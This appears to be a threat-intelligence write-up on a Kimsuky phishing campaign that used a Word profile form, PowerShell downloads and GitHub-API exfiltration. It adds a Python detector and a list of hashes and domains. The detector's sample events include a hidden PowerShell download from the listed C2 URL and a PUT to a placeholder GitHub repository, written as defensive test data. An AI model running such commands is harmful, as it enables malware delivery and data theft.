Kimsuky group spreads malware disguised as a profile form file (GitHub)

2023-03-23 Ahnlab Kimsuky group spreads malware disguised as a profile file (GitHub)

https://asec.ahnlab.com/ko/50275/


ASEC reports a Kimsuky campaign that impersonated a professor and emailed a password-protected Word document disguised as a biography/profile form. When macros were enabled, the document used PowerShell to contact C2, download additional scripts, and run malware consistent with earlier news-survey lure activity that steals browser-stored information. This variant changed its exfiltration method from FTP to the GitHub API, uploading suspected victim data to a specific repository. ASEC lists detections for the DOC downloader and PowerShell file-upload component and provides representative indicators including hxxp://hmcks.realma.r-e[.]kr/gl/ee.txt.
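The chain summarized above (Office document with macros spawning PowerShell, a download from the listed C2 domain, and exfiltration through the GitHub API) can be caught from process-creation telemetry. The following detector is an added example, not ASEC's code or anything from the original report: it runs over constructed Sysmon-style process events and flags Office-spawned PowerShell, PowerShell command lines that reference the GitHub API, and any event matching the hashes or domain listed on this page. The api.github.com host is an assumption (the report says only "GitHub API"), and the sample events and the repository name in them are constructed, not taken from the campaign.

```python
import re
from dataclasses import dataclass

# Indicators published on this page (MD5 hashes and the C2 domain).
IOC_DOMAINS = {"hmcks.realma.r-e.kr"}
IOC_HASHES = {
    "393cba61a23bf8159053e352abdd1a76",
    "a25acc6c420a1bb0fdc9456b4834c1b4",
}

# Office hosts that should rarely, if ever, launch a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Assumption: the GitHub API endpoint is api.github.com; the report only
# says the exfiltration moved from FTP to "the GitHub API".
GITHUB_API_RE = re.compile(r"api\.github\.com", re.IGNORECASE)


@dataclass
class ProcEvent:
    """Minimal Sysmon-like process-creation record (constructed schema)."""
    parent_image: str
    image: str
    command_line: str
    md5: str = ""


def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def analyze(events):
    """Return [(event_index, [reason, ...])] for every event that matches
    a behavioural rule or a published indicator."""
    findings = []
    for idx, ev in enumerate(events):
        parent = _basename(ev.parent_image)
        child = _basename(ev.image)
        cmd = ev.command_line.lower()
        reasons = []
        # Behaviour 1: macro-enabled document launching PowerShell.
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            reasons.append("office-spawned-powershell")
        # Behaviour 2: PowerShell talking to the GitHub API (exfil channel).
        if child in SCRIPT_HOSTS and GITHUB_API_RE.search(ev.command_line):
            reasons.append("powershell-github-api")
        # Indicator matches: C2 domain in the command line, known file hash.
        for domain in IOC_DOMAINS:
            if domain in cmd:
                reasons.append(f"ioc-domain:{domain}")
        if ev.md5.lower() in IOC_HASHES:
            reasons.append(f"ioc-hash:{ev.md5.lower()}")
        if reasons:
            findings.append((idx, reasons))
    return findings


# Constructed sample telemetry; event 0 is benign, 1-3 are suspicious.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              '"WINWORD.EXE" /n "C:\\Users\\user\\Downloads\\profile_form.doc"'),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "iwr http://hmcks.realma.r-e.kr/gl/ee.txt"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -c "Invoke-RestMethod -Uri https://api.github.com/'
              'repos/PLACEHOLDER_OWNER/PLACEHOLDER_REPO/contents/x -Method Put"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Users\user\AppData\Local\Temp\stage.exe",
              "stage.exe",
              md5="393CBA61A23BF8159053E352ABDD1A76"),
]


if __name__ == "__main__":
    for idx, reasons in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```

The behavioural rules matter more than the indicator matches: the hashes and domain will rotate with the next wave, while an Office process spawning PowerShell, and PowerShell pushing data to a code-hosting API, are durable signals for this actor's tradecraft.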

Indicators of Compromise

Type    Value                              First Seen  Last Seen
HASH    393cba61a23bf8159053e352abdd1a76   2023-03-23  2023-03-23
HASH    a25acc6c420a1bb0fdc9456b4834c1b4   2023-03-23  2023-03-23
URL     http://hmcks.realma.r-e.kr/gl/e…   2023-03-23  2023-03-23
DOMAIN  hmcks.realma.r-e.kr                2023-03-23  2023-03-23
